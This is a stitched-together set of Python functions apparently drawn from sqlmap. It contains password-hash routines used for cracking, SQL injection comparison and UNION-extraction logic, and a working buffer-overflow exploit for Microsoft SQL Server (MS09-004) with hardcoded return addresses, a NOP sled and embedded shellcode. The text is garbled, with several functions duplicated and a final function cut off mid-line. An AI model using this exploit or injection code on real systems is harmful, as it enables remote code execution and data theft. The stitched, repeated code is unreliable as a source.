def django_md5_passwd(password, salt, **kwargs): """ Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py >>> django_md5_passwd(password='******', salt='salt') 'md5$salt$972141bcbcb6a0acc96e92309175b3c5' """ return "md5$%s$%s" % (salt, md5(b"%s%s" % (getBytes(salt), getBytes(password))).hexdigest())
def django_sha1_passwd(password, salt, **kwargs): """ Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py >>> django_sha1_passwd(password='******', salt='salt') 'sha1$salt$6ce0e522aba69d8baa873f01420fccd0250fc5b2' """ return "sha1$%s$%s" % (salt, sha1(b"%s%s" % (getBytes(salt), getBytes(password))).hexdigest())
def joomla_passwd(password, salt, **kwargs): """ Reference: https://stackoverflow.com/a/10428239 >>> joomla_passwd(password='******', salt='6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf') 'e3d5794da74e917637332e0d21b76328:6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf' """ return "%s:%s" % (md5(b"%s%s" % (getBytes(password), getBytes(salt))).hexdigest(), salt)
def ssha_passwd(password, salt, **kwargs): """ >>> ssha_passwd(password='******', salt='salt') '{SSHA}mU1HPTvnmoXOhE4ROHP6sWfbfoRzYWx0' """ password = getBytes(password) salt = getBytes(salt) return "{SSHA}%s" % base64.b64encode(sha1(password + salt).digest() + salt)
def ssha256_passwd(password, salt, **kwargs): """ >>> ssha256_passwd(password='******', salt='salt') '{SSHA256}hhubsLrO/Aje9F/kJrgv5ZLE40UmTrVWvI7Dt6InP99zYWx0' """ password = getBytes(password) salt = getBytes(salt) return "{SSHA256}%s" % base64.b64encode(sha256(password + salt).digest() + salt)
def ssha512_passwd(password, salt, **kwargs): """ >>> ssha512_passwd(password='******', salt='salt') '{SSHA512}mCUSLfPMhXCQOJl9WHW/QMn9v9sjq7Ht/Wk7iVau8vLOfh+PeynkGMikqIE8sStFd0khdfcCD8xZmC6UyjTxsHNhbHQ=' """ password = getBytes(password) salt = getBytes(salt) return "{SSHA512}%s" % base64.b64encode(sha512(password + salt).digest() + salt)
def wordpress_passwd(password, salt, count, prefix, **kwargs): """ Reference(s): http://packetstormsecurity.org/files/74448/phpassbrute.py.txt http://scriptserver.mainframe8.com/wordpress_password_hasher.php >>> wordpress_passwd(password='******', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp') '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' """ def _encode64(input_, count): output = '' i = 0 while i < count: value = (input_[i] if isinstance(input_[i], int) else ord(input_[i])) i += 1 output = output + ITOA64[value & 0x3f] if i < count: value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 8) output = output + ITOA64[(value >> 6) & 0x3f] i += 1 if i >= count: break if i < count: value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 16) output = output + ITOA64[(value >> 12) & 0x3f] i += 1 if i >= count: break output = output + ITOA64[(value >> 18) & 0x3f] return output password = getBytes(password) salt = getBytes(salt) cipher = md5(salt) cipher.update(password) hash_ = cipher.digest() for i in xrange(count): _ = md5(hash_) _.update(password) hash_ = _.digest() return "%s%s" % (prefix, _encode64(hash_, 16))
def vbulletin_passwd(password, salt, **kwargs): """ Reference: https://stackoverflow.com/a/2202810 >>> vbulletin_passwd(password='******', salt='salt') '85c4d8ea77ebef2236fb7e9d24ba9482:salt' """ password = getBytes(password) salt = getBytes(salt) return "%s:%s" % (md5("%s%s" % (md5(password).hexdigest(), salt)).hexdigest(), salt)
def postgres_passwd(password, username, uppercase=False): """ Reference(s): http://pentestmonkey.net/blog/cracking-postgres-hashes/ >>> postgres_passwd(password='******', username='******', uppercase=False) 'md599e5ea7a6f7c3269995cba3927fd0093' """ username = getBytes(username) password = getBytes(password) retVal = "md5%s" % md5(password + username).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def crypt_generic_passwd(password, salt, **kwargs): """ Reference(s): http://docs.python.org/library/crypt.html http://helpful.knobs-dials.com/index.php/Hashing_notes http://php.net/manual/en/function.crypt.php http://carey.geek.nz/code/python-fcrypt/ >>> crypt_generic_passwd(password='******', salt='rl', uppercase=False) 'rl.3StKT.4T8M' """ password = getBytes(password) salt = getBytes(salt) return crypt(password, salt)
def sha512_generic_passwd(password, uppercase=False): """ >>> sha512_generic_passwd(password='******', uppercase=False) '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' """ retVal = sha512(getBytes(password)).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def sha384_generic_passwd(password, uppercase=False): """ >>> sha384_generic_passwd(password='******', uppercase=False) '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' """ retVal = sha384(getBytes(password)).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def apache_sha1_passwd(password, **kwargs): """ >>> apache_sha1_passwd(password='******') '{SHA}IGyAQTualsExLMNGt9JRe4RGPt0=' """ password = getBytes(password) return "{SHA}%s" % base64.b64encode(sha1(password).digest())
def sha256_generic_passwd(password, uppercase=False): """ >>> sha256_generic_passwd(password='******', uppercase=False) '13d249f2cb4127b40cfa757866850278793f814ded3c587fe5889e889a7a9f6c' """ retVal = sha256(getBytes(password)).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def sha224_generic_passwd(password, uppercase=False): """ >>> sha224_generic_passwd(password='******', uppercase=False) '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' """ retVal = sha224(getBytes(password)).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def md5_generic_passwd(password, uppercase=False): """ >>> md5_generic_passwd(password='******', uppercase=False) '179ad45c6ce2cb97cf1029e212046e81' """ password = getBytes(password) retVal = md5(password).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def sha1_generic_passwd(password, uppercase=False): """ >>> sha1_generic_passwd(password='******', uppercase=False) '206c80413b9a96c1312cc346b7d2517b84463edd' """ password = getBytes(password) retVal = sha1(password).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def mysql_passwd(password, uppercase=True): """ Reference(s): http://csl.sublevel3.org/mysql-password-function/ >>> mysql_passwd(password='******', uppercase=True) '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' """ password = getBytes(password) retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() return retVal.upper() if uppercase else retVal.lower()
def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g' """ Reference(s): http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ >>> oracle_old_passwd(password='******', username='******', uppercase=True) 'F894844C34402B67' """ IV, pad = "\0" * 8, "\0" username = getBytes(username) password = getBytes(password) unistr = "".join("\0%s" % c for c in (username + password).upper()) cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad) encrypted = cipher.encrypt(unistr) cipher = des(encrypted[-8:], CBC, IV, pad) encrypted = cipher.encrypt(unistr) retVal = hexencode(encrypted[-8:]) return retVal.upper() if uppercase else retVal.lower()
def hashKey(key): key = getBytes(key if isinstance(key, six.text_type) else repr(key)) retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400 return retVal
def _comparison(page, headers, code, getRatioValue, pageLength): threadData = getCurrentThreadData() if kb.testMode: threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "" threadData.lastComparisonPage = page threadData.lastComparisonCode = code if page is None and pageLength is None: return None if any((conf.string, conf.notString, conf.regexp)): rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page) # String to match in page when the query is True and/or valid if conf.string: return conf.string in rawResponse # String to match in page when the query is False and/or invalid if conf.notString: return conf.notString not in rawResponse # Regular expression to match in page when the query is True and/or valid if conf.regexp: return re.search(conf.regexp, rawResponse, re.I | re.M) is not None # HTTP code to match when the query is valid if conf.code: return conf.code == code seqMatcher = threadData.seqMatcher seqMatcher.set_seq1(kb.pageTemplate) if page: # In case of an DBMS error page return None if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: return None # Dynamic content lines to be excluded before comparison if not kb.nullConnection: page = removeDynamicContent(page) seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) if not pageLength: pageLength = len(page) if kb.nullConnection and pageLength: if not seqMatcher.a: errMsg = "problem occurred while retrieving original page content " errMsg += "which prevents sqlmap from continuation. Please rerun, " errMsg += "and if the problem persists turn off any optimization switches" raise SqlmapNoneDataException(errMsg) ratio = 1. * pageLength / len(seqMatcher.a) if ratio > 1.: ratio = 1. / ratio else: # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" # (e.g. if one page is PDF and the other is HTML) if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type): page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type): seqMatcher.a = getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") if any(_ is None for _ in (page, seqMatcher.a)): return None elif seqMatcher.a and page and seqMatcher.a == page: ratio = 1. elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)): if not page or not seqMatcher.a: return float(seqMatcher.a == page) else: ratio = 1. * len(seqMatcher.a) / len(page) if ratio > 1: ratio = 1. / ratio else: seq1, seq2 = None, None if conf.titles: seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) seq2 = extractRegexResult(HTML_TITLE_REGEX, page) else: seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a seq2 = getFilteredPageContent(page, True) if conf.textOnly else page if seq1 is None or seq2 is None: return None seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") if kb.heavilyDynamic: seq1 = seq1.split("\n") seq2 = seq2.split("\n") seqMatcher.set_seq1(seq1) seqMatcher.set_seq2(seq2) ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3) # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content if kb.matchRatio is None: if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND: kb.matchRatio = ratio logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) if kb.testMode: threadData.lastComparisonRatio = ratio # If it has been requested to return the ratio and not a comparison # response if getRatioValue: return ratio elif ratio > UPPER_RATIO_BOUND: return True elif ratio < LOWER_RATIO_BOUND: return False elif kb.matchRatio is None: return None else: return (ratio - kb.matchRatio) > DIFF_TOLERANCE
def unix_md5_passwd(password, salt, magic="$1$", **kwargs): """ Reference(s): http://www.sabren.net/code/python/crypt/md5crypt.py >>> unix_md5_passwd(password='******', salt='aD9ZLmkp') u'$1$aD9ZLmkp$DRM5a7rRZGyuuOPOjTEk61' """ def _encode64(value, count): output = "" while (count - 1 >= 0): count = count - 1 output += ITOA64[value & 0x3f] value = value >> 6 return output password = getBytes(password) magic = getBytes(magic) salt = getBytes(salt) salt = salt[:8] ctx = password + magic + salt final = md5(password + salt + password).digest() for pl in xrange(len(password), 0, -16): if pl > 16: ctx = ctx + final[:16] else: ctx = ctx + final[:pl] i = len(password) while i: if i & 1: ctx = ctx + chr(0) # if ($i & 1) { $ctx->add(pack("C", 0)); } else: ctx = ctx + password[0] i = i >> 1 final = md5(ctx).digest() for i in xrange(1000): ctx1 = "" if i & 1: ctx1 = ctx1 + password else: ctx1 = ctx1 + final[:16] if i % 3: ctx1 = ctx1 + salt if i % 7: ctx1 = ctx1 + password if i & 1: ctx1 = ctx1 + final[:16] else: ctx1 = ctx1 + password final = md5(ctx1).digest() hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))), 4) hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4) hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4) hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4) hash_ = hash_ + _encode64((int(ord(final[4])) << 16) | (int(ord(final[10])) << 8) | (int(ord(final[5]))), 4) hash_ = hash_ + _encode64((int(ord(final[11]))), 2) return "%s%s$%s" % (magic, salt.decode(UNICODE_ENCODING), hash_.decode(UNICODE_ENCODING))
def spHeapOverflow(self): """ References: * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004 * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co """ returns = { # 2003 Service Pack 0 "2003-0": (""), # 2003 Service Pack 1 "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"), # 2003 Service Pack 2 updated at 12/2008 # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"), # 2003 Service Pack 2 updated at 05/2009 "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), # 2003 Service Pack 2 updated at 09/2009 # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), } addrs = None for versionSp, data in returns.items(): version, sp = versionSp.split("-") sp = int(sp) if Backend.getOsVersion() == version and Backend.getOsServicePack( ) == sp: addrs = data break if not addrs: errMsg = "sqlmap can not exploit the stored procedure buffer " errMsg += "overflow because it does not have a valid return " errMsg += "code for the underlying operating system (Windows " errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack()) raise SqlmapUnsupportedFeatureException(errMsg) shellcodeChar = "" hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1])) for hexPair in xrange(0, len(hexStr), 2): shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2] shellcodeChar = shellcodeChar[:-1] self.spExploit = """DECLARE @buf NVARCHAR(4000), @val NVARCHAR(4), @counter INT SET @buf = ' DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' SET @val = CHAR(0x41) SET @counter = 0 WHILE @counter < 3320 BEGIN SET @counter = @counter + 1 IF @counter = 411 BEGIN /* pointer to call [ecx+8] */ SET @buf = @buf + %s /* push ebp, pop esp, ret 4 */ SET @buf = @buf + %s /* push ecx, pop esp, pop ebp, retn 8 */ SET @buf = @buf + %s /* Garbage */ SET @buf = @buf + CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51) /* retn 1c */ SET @buf = @buf + %s /* retn 1c */ SET @buf = @buf + %s /* anti DEP */ SET @buf = @buf + %s /* jmp esp */ SET @buf = @buf + %s /* jmp esp */ SET @buf = @buf + %s SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) set @buf = @buf + CHAR(0x64)+CHAR(0x8B)+CHAR(0x25)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00) set @buf = @buf + CHAR(0x8B)+CHAR(0xEC) set @buf = @buf + CHAR(0x83)+CHAR(0xEC)+CHAR(0x20) /* Metasploit shellcode */ SET @buf = @buf + %s SET @buf = @buf + CHAR(0x6a)+CHAR(0x00)+char(0xc3) SET @counter = @counter + 302 SET @val = CHAR(0x43) CONTINUE END SET @buf = @buf + @val END SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' EXEC master..sp_executesql @buf """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar) self.spExploit = self.spExploit.replace(" ", "").replace("\n", " ") logger.info( "triggering the buffer overflow vulnerability, please wait..") inject.goStacked(self.spExploit, silent=True)
def escaper(value): if all(_ < 128 for _ in getOrds(value)): return "0x%s" % getUnicode(binascii.hexlify(getBytes(value))) else: return "CONVERT(0x%s USING utf8)" % getUnicode(binascii.hexlify(getBytes(value)))
def _oneShotUnionUse(expression, unpack=True, limited=False): retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector if not kb.rowXmlMode: injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) kb.unionDuplicates = vector[7] kb.forcePartialUnion = vector[8] query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] else: where = vector[6] query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False) payload = agent.payload(newValue=query, where=where) # Perform the request page, headers, _ = Request.queryPage(payload, content=True, raise404=False) incrementCounter(PAYLOAD.TECHNIQUE.UNION) if not kb.rowXmlMode: # Parse the returned page to get the exact UNION-based # SQL injection output def _(regex): return firstNotNone( extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE) ) # Automatically patching last char trimming cases if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): warnMsg = "automatically patching output having last char trimmed" singleTimeWarnMessage(warnMsg) page = page.replace(kb.chars.stop[:-1], kb.chars.stop) retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) else: output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page) if output: try: root = xml.etree.ElementTree.fromstring(safeStringFormat("<root>%s</root>", getBytes(output))) retVal = "" for column in kb.dumpColumns: base64 = True for child in root: value = child.attrib.get(column, "").strip() if value and not re.match(r"\A[a-zA-Z0-9+/]+={0,2}\Z", value): base64 = False break try: value.decode("base64") except binascii.Error: base64 = False break if base64: for child in root: child.attrib[column] = child.attrib.get(column, "").decode("base64") or NULL for child in root: row = [] for column in kb.dumpColumns: row.append(child.attrib.get(column, NULL)) retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(row), kb.chars.stop) except: pass else: retVal = getUnicode(retVal) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): retVal = htmlunescape(retVal).replace("<br>", "\n") hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) elif not kb.rowXmlMode: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) else: vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector kb.unionDuplicates = vector[7] return retVal
def hashKey(key): key = getBytes(key if isinstance(key, six.text_type) else repr(key)) retVal = int( hashlib.md5(key).hexdigest(), 16 ) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400 return retVal
def escaper(value): # Reference: http://stackoverflow.com/questions/3444335/how-do-i-quote-a-utf-8-string-literal-in-sqlite3 return "CAST(X'%s' AS TEXT)" % binascii.hexlify(getBytes(value))
def _oneShotUnionUse(expression, unpack=True, limited=False): retVal = hashDBRetrieve( "%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector if not kb.rowXmlMode: injExpression = unescaper.escape( agent.concatQuery(expression, unpack)) kb.unionDuplicates = vector[7] kb.forcePartialUnion = vector[8] query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[ 6] else: where = vector[6] query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False) payload = agent.payload(newValue=query, where=where) # Perform the request page, headers, _ = Request.queryPage(payload, content=True, raise404=False) incrementCounter(PAYLOAD.TECHNIQUE.UNION) if not kb.rowXmlMode: # Parse the returned page to get the exact UNION-based # SQL injection output def _(regex): return firstNotNone( extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult( regex, removeReflectiveValues( listToStrValue(( _ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI) ) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)) # Automatically patching last char trimming cases if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): warnMsg = "automatically patching output having last char trimmed" singleTimeWarnMessage(warnMsg) page = page.replace(kb.chars.stop[:-1], kb.chars.stop) retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) else: output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page) if output: try: root = xml.etree.ElementTree.fromstring( safeStringFormat("<root>%s</root>", getBytes(output))) retVal = "" for column in kb.dumpColumns: base64 = True for child in root: value = child.attrib.get(column, "").strip() if value and not re.match( r"\A[a-zA-Z0-9+/]+={0,2}\Z", value): base64 = False break try: value.decode("base64") except binascii.Error: base64 = False break if base64: for child in root: child.attrib[column] = child.attrib.get( column, "").decode("base64") or NULL for child in root: row = [] for column in kb.dumpColumns: row.append(child.attrib.get(column, NULL)) retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(row), kb.chars.stop) except: pass else: retVal = getUnicode(retVal) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): retVal = htmlunescape(retVal).replace("<br>", "\n") hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) elif not kb.rowXmlMode: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) else: vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector kb.unionDuplicates = vector[7] return retVal
def checkCharEncoding(encoding, warn=True): """ Checks encoding name, repairs common misspellings and adjusts to proper namings used in codecs module >>> checkCharEncoding('iso-8858', False) 'iso8859-1' >>> checkCharEncoding('en_us', False) 'utf8' """ if isListLike(encoding): encoding = unArrayizeValue(encoding) if encoding: encoding = encoding.lower() else: return encoding # Reference: http://www.destructor.de/charsets/index.htm translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: encoding = encoding[:encoding.find(delimiter)].strip() encoding = encoding.replace(""", "") # popular typos/errors if "8858" in encoding: encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 elif "8559" in encoding: encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 elif "8895" in encoding: encoding = encoding.replace("8895", "8859") # iso-8895 -> iso-8859 elif "5889" in encoding: encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 elif "5589" in encoding: encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 elif "2313" in encoding: encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312 elif encoding.startswith("x-"): encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish elif "windows-cp" in encoding: encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 # name adjustment for compatibility if encoding.startswith("8859"): encoding = "iso-%s" % encoding elif encoding.startswith("cp-"): encoding = "cp%s" % encoding[3:] elif encoding.startswith("euc-"): encoding = "euc_%s" % encoding[4:] elif encoding.startswith("windows") and not encoding.startswith("windows-"): encoding = "windows-%s" % encoding[7:] elif encoding.find("iso-88") > 0: encoding = encoding[encoding.find("iso-88"):] elif encoding.startswith("is0-"): encoding = "iso%s" % encoding[4:] elif encoding.find("ascii") > 0: encoding = "ascii" elif encoding.find("utf8") > 0: encoding = "utf8" elif encoding.find("utf-8") > 0: encoding = "utf-8" # Reference: http://philip.html5.org/data/charsets-2.html if encoding in translate: encoding = translate[encoding] elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding): return None # Reference: http://www.iana.org/assignments/character-sets # Reference: http://docs.python.org/library/codecs.html try: codecs.lookup(encoding) except: encoding = None if encoding: try: six.text_type(getBytes(randomStr()), encoding) except: if warn: warnMsg = "invalid web page charset '%s'" % encoding singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None return encoding
def escaper(value): # Reference: http://stackoverflow.com/questions/3444335/how-do-i-quote-a-utf-8-string-literal-in-sqlite3 return "CAST(X'%s' AS TEXT)" % getUnicode(binascii.hexlify(getBytes(value)))
def dbTableValues(self, tableValues): replication = None rtable = None dumpFP = None appendToFile = False warnFile = False if tableValues is None: return db = tableValues["__infos__"]["db"] if not db: db = "All" table = tableValues["__infos__"]["table"] if conf.api: self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) return dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) if conf.dumpFormat == DUMP_FORMAT.SQLITE: replication = Replication( os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): if not os.path.isdir(dumpDbPath): try: os.makedirs(dumpDbPath) except: warnFile = True _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)) dumpDbPath = os.path.join( conf.dumpPath, "%s-%s" % (_, hashlib.md5(getBytes(db)).hexdigest()[:8])) if not os.path.isdir(dumpDbPath): try: os.makedirs(dumpDbPath) except Exception as ex: try: tempDir = 